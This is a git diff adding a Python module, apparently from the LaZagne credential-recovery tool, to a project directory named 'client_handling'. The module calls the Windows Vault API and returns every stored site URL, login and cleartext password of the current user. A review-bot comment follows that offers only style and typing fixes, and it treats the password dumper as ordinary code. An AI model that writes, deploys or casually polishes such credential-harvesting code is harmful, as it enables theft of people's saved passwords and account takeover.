Diffstat (limited to 'foreign/client_handling/lazagne/softwares/windows/vault.py')
-rw-r--r--foreign/client_handling/lazagne/softwares/windows/vault.py71
1 files changed, 71 insertions, 0 deletions
diff --git a/foreign/client_handling/lazagne/softwares/windows/vault.py b/foreign/client_handling/lazagne/softwares/windows/vault.py
new file mode 100644
index 0000000..9c8e8cc
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/vault.py
@@ -0,0 +1,71 @@
+# -*- coding: utf-8 -*-
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+from ctypes.wintypes import *
+
+
+class Vault(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'vault', 'windows', only_from_current_user=True)
+
+ def run(self):
+
+ # retrieve passwords (IE, etc.) using the Windows Vault API
+ if float(get_os_version()) <= 6.1:
+ self.info(u'Vault not supported for this OS')
+ return
+
+ cbVaults = DWORD()
+ vaults = LPGUID()
+ hVault = HANDLE(INVALID_HANDLE_VALUE)
+ cbItems = DWORD()
+ items = c_char_p()
+ pwd_found = []
+
+ if vaultEnumerateVaults(0, byref(cbVaults), byref(vaults)) == 0:
+ if cbVaults.value == 0:
+ self.debug(u'No Vaults found')
+ return
+ else:
+ for i in range(cbVaults.value):
+ if vaultOpenVault(byref(vaults[i]), 0, byref(hVault)) == 0:
+ if hVault:
+ if vaultEnumerateItems(hVault, 0x200, byref(cbItems), byref(items)) == 0:
+
+ for j in range(cbItems.value):
+
+ items8 = cast(items, POINTER(VAULT_ITEM_WIN8))
+ pItem8 = PVAULT_ITEM_WIN8()
+ try:
+ values = {
+ 'URL': str(items8[j].pResource.contents.data.string),
+ 'Login': str(items8[j].pUsername.contents.data.string)
+ }
+ if items8[j].pName:
+ values['Name'] = items8[j].pName
+
+ if vaultGetItem8(hVault, byref(items8[j].id), items8[j].pResource,
+ items8[j].pUsername, items8[j].unknown0, None, 0,
+ byref(pItem8)) == 0:
+
+ password = pItem8.contents.pPassword.contents.data.string
+ # Remove password too long
+ if password and len(password) < 100:
+ values['Password'] = password
+
+ pwd_found.append(values)
+
+ except Exception as e:
+ self.debug(e)
+
+ if pItem8:
+ vaultFree(pItem8)
+
+ if items:
+ vaultFree(items)
+
+ vaultCloseVault(byref(hVault))
+
+ vaultFree(vaults)
+
+ return pwd_found
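Review bot: The two wildcard imports at the top of the new file hide where `vaultEnumerateVaults`, `vaultGetItem8`, `VAULT_ITEM_WIN8`, `cast` and `byref` are defined, and `from ctypes.wintypes import *` coming second can silently shadow names from `winstructure`; importing the names explicitly would let a reader audit the native call surface from this file alone. `run` also returns `None` on the unsupported-OS and no-vaults paths but a list otherwise, so if callers iterate over the result, `return []` at both early exits would give them a single type. A docstring on `run` should state that each returned dict carries the vault entry's URL, login and, when present, the cleartext password, so that callers keep the result out of debug logs. The `0x200` flag passed to `vaultEnumerateItems` and the `len(password) < 100` cut-off each deserve a one-line comment, since neither is explained in the file.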